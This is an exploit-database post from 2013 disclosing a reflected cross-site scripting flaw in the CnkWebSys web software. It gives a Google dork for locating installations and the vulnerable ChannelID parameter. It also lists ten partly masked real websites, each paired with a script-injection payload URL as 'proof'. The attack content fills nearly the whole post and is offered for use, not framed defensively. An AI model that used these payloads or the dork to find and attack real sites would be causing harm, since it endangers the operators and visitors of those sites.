Home / exploits CnkWebSys Cross site scripting vulnerability
Posted on 03 September 2013
<pre>#******************************************************************************** # [+] Exploit Title : CnkWebSys Cross site scripting vulnerability #********************************************************************* # [+] Software link : http://www.webchina.com.cn #***************************************************************** # [+] Exploit Author : Ashiyane Digital Security Team #**************************************************** # [+] Tested on: Windows 7 , Linux #********************************* # [+] Google Dork : intext:"Powered by CnkWebSys © CNK Inc." #*********************************************************** # [+] Date: 2013/09/01 #********************* -------------------------------------------------------------------- # [+] Exploit : # # [+] Location : [Target]/english/about.asp?ChannelID=[xss] # #------- # Proof: #------- # # http://www.aaXde.com/english/about.asp?ChannelID="/><script>alert(1);</script> # # http://www.hypeXwer.com/english//about.asp?ChannelID="/><script>alert(1);</script> # # http://www.szXes.com/english/about.asp?ChannelID="/><script>alert(1);</script> # # http://www.saX.cn/english/about.asp?ChannelID="/><script>alert(1);</script> # # http://www.suX.com/english//about.asp?ChannelID="/><script>alert(1);</script> # # http://www.gzXargo.com/english//about.asp?ChannelID="/><script>alert(1);</script> # # http://www.ruitrXup.com/english//about.asp?ChannelID="/><script>alert(1);</script> # # http://xyhXXXw.cn/english//about.asp?ChannelID="/><script>alert(1);</script> # # http://wwXXom/english//about.asp?ChannelID="/><script>alert(1);</script> # # http://wwXXly.com/english/about.asp?ChannelID="/><script>alert(1);</script> # ###################### discovered by : ACC3SS ###################### </pre>
